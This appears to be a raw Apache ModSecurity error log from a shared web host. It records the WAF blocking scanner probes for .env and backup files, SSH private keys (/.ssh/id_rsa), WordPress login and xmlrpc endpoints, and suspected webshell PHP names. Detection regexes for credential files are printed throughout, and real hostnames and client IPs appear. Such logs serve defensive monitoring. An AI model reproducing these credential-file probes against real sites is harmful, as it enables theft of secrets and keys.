[Tue May 26 14:33:44.057335 2026] [security2:error] [pid 626747:tid 626957] [client 208.84.100.165:49248] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.swp"] [unique_id "ahVh8BVF8Qmdmw_OMfLhdAAAAVo"]
[Tue May 26 14:33:44.057454 2026] [security2:error] [pid 626747:tid 626967] [client 208.84.100.165:49450] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.local.old"] [unique_id "ahVh8BVF8Qmdmw_OMfLhdwAAAWQ"]
[Tue May 26 14:33:44.058431 2026] [security2:error] [pid 626747:tid 626969] [client 208.84.100.165:49302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env.local.backup"] [unique_id "ahVh8BVF8Qmdmw_OMfLheAAAAWY"]
[Tue May 26 14:33:45.184121 2026] [security2:error] [pid 626747:tid 626965] [client 4.204.220.190:44892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/bob.php"] [unique_id "ahVh8RVF8Qmdmw_OMfLhngAAAWI"]
[Tue May 26 14:33:45.184225 2026] [security2:error] [pid 626747:tid 626965] [client 4.204.220.190:44892] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/bob.php"] [unique_id "ahVh8RVF8Qmdmw_OMfLhngAAAWI"]
[Tue May 26 14:33:45.442529 2026] [security2:error] [pid 626747:tid 626897] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh8RVF8Qmdmw_OMfLhkwAAAR4"]
[Tue May 26 14:33:46.992189 2026] [security2:error] [pid 626747:tid 626904] [client 4.204.220.190:21636] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/t3s.php"] [unique_id "ahVh8hVF8Qmdmw_OMfLhyQAAASU"]
[Tue May 26 14:33:46.992325 2026] [security2:error] [pid 626747:tid 626904] [client 4.204.220.190:21636] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/t3s.php"] [unique_id "ahVh8hVF8Qmdmw_OMfLhyQAAASU"]
[Tue May 26 14:33:47.102090 2026] [security2:error] [pid 626747:tid 626785] [remote 52.18.195.140:54102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVh8hVF8Qmdmw_OMfLhxAABZSU"]
[Tue May 26 14:33:47.352764 2026] [security2:error] [pid 626747:tid 626975] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh8hVF8Qmdmw_OMfLhxwAAAWw"]
[Tue May 26 14:33:47.566759 2026] [security2:error] [pid 626747:tid 626879] [client 202.141.83.254:53960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVh8xVF8Qmdmw_OMfLh1wAAAQw"]
[Tue May 26 14:33:47.566872 2026] [security2:error] [pid 626747:tid 626879] [client 202.141.83.254:53960] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVh8xVF8Qmdmw_OMfLh1wAAAQw"]
[Tue May 26 14:33:48.238113 2026] [proxy:error] [pid 626747:tid 626952] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:48.238171 2026] [proxy_http:error] [pid 626747:tid 626952] [client 4.204.220.190:53251] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:48.238802 2026] [proxy:error] [pid 626747:tid 626952] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:48.238844 2026] [proxy_http:error] [pid 626747:tid 626952] [client 4.204.220.190:53251] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:48.238939 2026] [security2:error] [pid 626747:tid 626952] [client 4.204.220.190:53251] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.bramas.in"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVh9BVF8Qmdmw_OMfLh7AAAAVU"]
[Tue May 26 14:33:49.676723 2026] [proxy:error] [pid 626747:tid 626999] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:49.676801 2026] [proxy_http:error] [pid 626747:tid 626999] [client 4.204.220.190:21426] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:49.677360 2026] [proxy:error] [pid 626747:tid 626999] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:49.677395 2026] [proxy_http:error] [pid 626747:tid 626999] [client 4.204.220.190:21426] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:49.677508 2026] [security2:error] [pid 626747:tid 626999] [client 4.204.220.190:21426] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.bramas.in"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVh9RVF8Qmdmw_OMfLiJQAAAYQ"]
[Tue May 26 14:33:49.872739 2026] [security2:error] [pid 626747:tid 626957] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh9RVF8Qmdmw_OMfLiGgAAAVo"]
[Tue May 26 14:33:50.236879 2026] [proxy:error] [pid 626747:tid 626898] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:50.236985 2026] [proxy_http:error] [pid 626747:tid 626898] [client 4.204.220.190:45481] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:50.237883 2026] [proxy:error] [pid 626747:tid 626898] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:50.237933 2026] [proxy_http:error] [pid 626747:tid 626898] [client 4.204.220.190:45481] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:50.238073 2026] [security2:error] [pid 626747:tid 626898] [client 4.204.220.190:45481] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.bramas.in"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVh9hVF8Qmdmw_OMfLiNgAAAR8"]
[Tue May 26 14:33:51.510337 2026] [security2:error] [pid 626747:tid 626906] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh9xVF8Qmdmw_OMfLiSwAAASc"]
[Tue May 26 14:33:51.629894 2026] [security2:error] [pid 626747:tid 626957] [client 4.204.220.190:44927] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/uwu.php"] [unique_id "ahVh9xVF8Qmdmw_OMfLiXAAAAVo"]
[Tue May 26 14:33:51.630030 2026] [security2:error] [pid 626747:tid 626957] [client 4.204.220.190:44927] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/uwu.php"] [unique_id "ahVh9xVF8Qmdmw_OMfLiXAAAAVo"]
[Tue May 26 14:33:52.477053 2026] [security2:error] [pid 626747:tid 626965] [client 114.119.150.168:22247] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVh-BVF8Qmdmw_OMfLidwAAAWI"], referer: http://glorodavionics.com/index.php?route=product%2Fcategory&path=72_25_106
[Tue May 26 14:33:52.679479 2026] [security2:error] [pid 626747:tid 626878] [client 4.204.220.190:21414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/uwa.php"] [unique_id "ahVh-BVF8Qmdmw_OMfLihQAAAQs"]
[Tue May 26 14:33:52.679580 2026] [security2:error] [pid 626747:tid 626878] [client 4.204.220.190:21414] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/uwa.php"] [unique_id "ahVh-BVF8Qmdmw_OMfLihQAAAQs"]
[Tue May 26 14:33:53.679381 2026] [security2:error] [pid 626747:tid 627000] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh-RVF8Qmdmw_OMfLilAAAAYU"]
[Tue May 26 14:33:53.735291 2026] [security2:error] [pid 626747:tid 626898] [client 4.204.220.190:12650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/crgio.php"] [unique_id "ahVh-RVF8Qmdmw_OMfLiqwAAAR8"]
[Tue May 26 14:33:53.735436 2026] [security2:error] [pid 626747:tid 626898] [client 4.204.220.190:12650] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/crgio.php"] [unique_id "ahVh-RVF8Qmdmw_OMfLiqwAAAR8"]
[Tue May 26 14:33:53.930508 2026] [security2:error] [pid 626747:tid 626820] [remote 103.230.156.120:60164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVh-RVF8Qmdmw_OMfLipwABL0g"]
[Tue May 26 14:33:54.860311 2026] [security2:error] [pid 626747:tid 626959] [client 85.121.127.31:60628] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/.env.old"] [unique_id "ahVh-hVF8Qmdmw_OMfLi3wAAAVw"]
[Tue May 26 14:33:55.052921 2026] [security2:error] [pid 626747:tid 626984] [client 85.121.127.31:60278] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/.env"] [unique_id "ahVh-xVF8Qmdmw_OMfLi6gAAAXU"]
[Tue May 26 14:33:55.053177 2026] [security2:error] [pid 626747:tid 626914] [client 85.121.127.31:60292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/backend/.env"] [unique_id "ahVh-xVF8Qmdmw_OMfLi7wAAAS8"]
[Tue May 26 14:33:55.054056 2026] [security2:error] [pid 626747:tid 626938] [client 85.121.127.31:60298] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVh-xVF8Qmdmw_OMfLi7gAAAUc"]
[Tue May 26 14:33:55.056385 2026] [security2:error] [pid 626747:tid 626984] [client 85.121.127.31:60284] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/.env.bak"] [unique_id "ahVh-xVF8Qmdmw_OMfLi_AAAAXU"]
[Tue May 26 14:33:55.057665 2026] [security2:error] [pid 626747:tid 626878] [client 85.121.127.31:60294] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/app/.env"] [unique_id "ahVh-xVF8Qmdmw_OMfLjAQAAAQs"]
[Tue May 26 14:33:55.057879 2026] [security2:error] [pid 626747:tid 626882] [client 85.121.127.31:60282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/.env.backup"] [unique_id "ahVh-xVF8Qmdmw_OMfLi-wAAAQ8"]
[Tue May 26 14:33:55.058907 2026] [security2:error] [pid 626747:tid 626941] [client 85.121.127.31:60296] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/public/.env"] [unique_id "ahVh-xVF8Qmdmw_OMfLi_gAAAUo"]
[Tue May 26 14:33:55.059013 2026] [security2:error] [pid 626747:tid 626895] [client 85.121.127.31:60288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/api/.env"] [unique_id "ahVh-xVF8Qmdmw_OMfLjBQAAARw"]
[Tue May 26 14:33:55.058709 2026] [security2:error] [pid 626747:tid 626918] [client 85.121.127.31:60302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "eurodomini.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVh-xVF8Qmdmw_OMfLjAAAAATM"]
[Tue May 26 14:33:55.188456 2026] [security2:error] [pid 626747:tid 626908] [client 4.204.220.190:12456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/geforce.php"] [unique_id "ahVh-xVF8Qmdmw_OMfLjCgAAASk"]
[Tue May 26 14:33:55.188576 2026] [security2:error] [pid 626747:tid 626908] [client 4.204.220.190:12456] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/geforce.php"] [unique_id "ahVh-xVF8Qmdmw_OMfLjCgAAASk"]
[Tue May 26 14:33:55.708651 2026] [security2:error] [pid 626747:tid 626934] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh-xVF8Qmdmw_OMfLjEAAAAUM"]
[Tue May 26 14:33:55.749214 2026] [security2:error] [pid 626747:tid 626971] [client 4.204.220.190:53279] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/pucci.php"] [unique_id "ahVh-xVF8Qmdmw_OMfLjJgAAAWg"]
[Tue May 26 14:33:55.749381 2026] [security2:error] [pid 626747:tid 626971] [client 4.204.220.190:53279] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/pucci.php"] [unique_id "ahVh-xVF8Qmdmw_OMfLjJgAAAWg"]
[Tue May 26 14:33:56.241603 2026] [proxy:error] [pid 626747:tid 626879] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:56.241747 2026] [proxy_http:error] [pid 626747:tid 626879] [client 4.204.220.190:21669] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:56.242485 2026] [proxy:error] [pid 626747:tid 626879] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:56.242519 2026] [proxy_http:error] [pid 626747:tid 626879] [client 4.204.220.190:21669] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:56.242635 2026] [security2:error] [pid 626747:tid 626879] [client 4.204.220.190:21669] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.bramas.in"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVh_BVF8Qmdmw_OMfLjTgAAAQw"]
[Tue May 26 14:33:56.909825 2026] [proxy:error] [pid 626747:tid 626916] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:56.909897 2026] [proxy_http:error] [pid 626747:tid 626916] [client 4.204.220.190:38621] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:56.910465 2026] [proxy:error] [pid 626747:tid 626916] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:56.910500 2026] [proxy_http:error] [pid 626747:tid 626916] [client 4.204.220.190:38621] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:56.910609 2026] [security2:error] [pid 626747:tid 626916] [client 4.204.220.190:38621] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.bramas.in"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVh_BVF8Qmdmw_OMfLjYAAAATE"]
[Tue May 26 14:33:57.263934 2026] [security2:error] [pid 626747:tid 626975] [client 4.204.220.190:12652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/one.php"] [unique_id "ahVh_RVF8Qmdmw_OMfLjZwAAAWw"]
[Tue May 26 14:33:57.264063 2026] [security2:error] [pid 626747:tid 626975] [client 4.204.220.190:12652] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/one.php"] [unique_id "ahVh_RVF8Qmdmw_OMfLjZwAAAWw"]
[Tue May 26 14:33:57.453291 2026] [security2:error] [pid 626747:tid 626958] [client 4.204.220.190:45484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/wp-temp.php"] [unique_id "ahVh_RVF8Qmdmw_OMfLjcwAAAVs"]
[Tue May 26 14:33:57.453439 2026] [security2:error] [pid 626747:tid 626958] [client 4.204.220.190:45484] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/wp-temp.php"] [unique_id "ahVh_RVF8Qmdmw_OMfLjcwAAAVs"]
[Tue May 26 14:33:57.756723 2026] [security2:error] [pid 626747:tid 626927] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh_RVF8Qmdmw_OMfLjbwAAATw"]
[Tue May 26 14:33:57.895686 2026] [security2:error] [pid 626747:tid 626881] [client 14.187.90.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh_RVF8Qmdmw_OMfLjdQAAAQ4"]
[Tue May 26 14:33:58.107640 2026] [security2:error] [pid 626747:tid 626877] [client 202.141.83.254:53808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVh_RVF8Qmdmw_OMfLjnAAAAQo"]
